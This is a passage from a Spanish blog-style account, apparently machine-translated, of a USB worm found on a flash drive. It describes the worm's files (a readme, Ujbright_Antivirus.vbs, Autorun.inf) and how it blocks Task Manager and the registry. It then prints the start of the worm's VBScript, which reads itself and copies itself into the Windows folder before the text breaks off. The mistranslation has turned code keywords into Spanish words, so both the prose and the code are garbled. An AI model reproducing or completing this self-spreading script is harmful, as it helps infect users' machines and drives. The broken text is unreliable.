Después de un tiempo palco recibiendo algunos datos de un profesor de la universidad, empujo mi jetflash drive en su USBport. Después de que aparezca proceso de exploración y se cierra. Me convertí Satisfecho, abro myFlash unidad. Me pareció que todos los datos relavent a mi profesor me dieron solo con taht encontré un archivo adicional. nombrado como un archivo readme. i aunque es nuevo, entonces lo abro y hay algo de basura escrita en ese archivo. Así que eliminarlo. But..there está de vuelta otra vez. Ahora IDelete que una y otra vez la espalda.
Ido, sé lo que es, así que abrir el administrador de tareas. Nope no se abre. así que trato msconfig, el registro, pero incluso se bloquean todos los thingin mi equipo. Esto es emocionante. No porque tengo trabajo que hacer o porque ahora empiezo amor a infectarse, sino por el hecho de que el resultado de juguetear alrededor finalmente me dieron algo de código. Así que mi codicia por un código ingenioso comienza.
Todo esto sucederá en ventanas Soi reiniciar el PC y arrancar en linux (Ohh sí, es la encantadora Ubuntu desde DVD).
Así que Acess o archivos de ventanas abiertas de aquí, ahora en Examinar para system32 y comprobé esos archivos. También mucho inserta la unidad flash infectada volver oliese pero no te preocupes todo lo que hace, porque no se puede jugar con mi encantadora linux. Ahora volveré encontré tres archivos adicionales en la unidad: Una readme idiota Ujbright_Antivirus.vbs Autorun.inf Fue interesante para mí fue que el segundo archivo. En tha encontré guión por supuesto. La abro y encuentro verdadero programe de la construcción lógica en eso.
Mientras wrriting script de triunfo, una destinada a ejecutar después de algún tiempo una y otra vez y otra vez. Pero todo lo que hizo no fue curroption sino para salvar su existencia y copia para cada unidad flash que vio. Esto estaba en el guión en ese segundo archivo: On Error Resume Next Dim fso, WSCR, tf, scrText, ganar, hacha Set fso = CreateObject ("Scripting.FileSystemObject") Ajuste WSCR = CreateObject ("WScript.Shell") win = fso.GetSpecialFolder
(0) tf = WScript.ScriptFullName x = LCase (tf) Si mediana (x, 4) = "UjBright_Antivirus.vbs" Entonces wscr.Run "explorer.exe" y fso.
Getfile (tf) .Drive.Path End If Set myFile = fso.Getfile (tf) .OpenAsTextStream
(1) Do Until myFile.AtEndOfStream scrText = scrText y myFile.ReadLine y vbCRLF Loop ax = fso.FileExists (ganar y "\\ UjBright_Antivirus.vbs") Set MiArchivo = fso .CreateTextFile (gana